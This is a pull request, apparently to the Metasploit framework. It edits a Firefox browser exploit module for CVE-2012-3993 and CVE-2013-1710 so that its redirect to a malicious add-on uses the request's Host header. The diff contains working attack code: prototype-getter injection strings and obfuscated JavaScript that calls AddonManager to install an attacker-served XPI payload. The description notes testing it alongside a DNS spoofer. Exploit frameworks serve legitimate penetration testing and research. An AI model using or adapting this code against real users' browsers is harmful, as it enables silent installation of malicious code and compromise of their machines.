### PR TITLE
2013-1710 - Use header VHOST info for redirection in firefox_proto_crmfrequest

### DIFF
--- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
+++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
@@ -45,10 +45,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'DisclosureDate' => "Aug 6 2013",
       'References' => [
         ['CVE', '2012-3993'],  # used to install function that gets called from chrome:// (ff<15)
-        ['OSVDB', '86111'],
         ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=768101'],
         ['CVE', '2013-1710'],  # used to peek into privileged caller's closure (ff<23)
-        ['OSVDB', '96019']
       ],
       'BrowserRequirements' => {
         :source  => 'script',
@@ -68,15 +66,23 @@ class MetasploitModule < Msf::Exploit::Remote
       send_response(cli, generate_addon_xpi(cli).pack, { 'Content-Type' => 'application/x-xpinstall' })
     else
       print_status("Sending HTML")
-      send_response_html(cli, generate_html(target_info))
+      res = generate_html(target_info,request.headers['Host'])
+      vprint_status res.to_s
+      send_response_html(cli, res)
     end
   end
 
-  def generate_html(target_info)
+  def generate_html(target_info,refer)
     injection = if target_info[:ua_ver].to_i == 15
       "Function.prototype.call.call(p.__defineGetter__,obj,key,runme);"
     else
       "p2.constructor.defineProperty(obj,key,{get:runme});"
+    end
+
+    if refer.nil? or refer.blank?
+      redirect = "#{get_module_uri}/addon.xpi"
+    else
+      redirect = "http://#{refer}/#{@exploit_receiver_page}/addon.xpi"
     end
 
     script = js_obfuscate %Q|
@@ -107,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
     js_payload = js_obfuscate %Q|
       if (!window.done) {
         window.AddonManager.getInstallForURL(
-          '#{get_module_uri}/addon.xpi',
+          '#{redirect}',
           function(install) { install.install() },
           'application/x-xpinstall'
         );


### PR DESCRIPTION
When this exploit is hit by hostname, the HTTP request contains
a Host header field which does not match the IP-based redirection.
Update the module to check request headers for host information,
and fallback to the prior behavior if none exists.

Tested in conjunction with #6611 DNS spoofer - works great, see
issue #7098 for details.
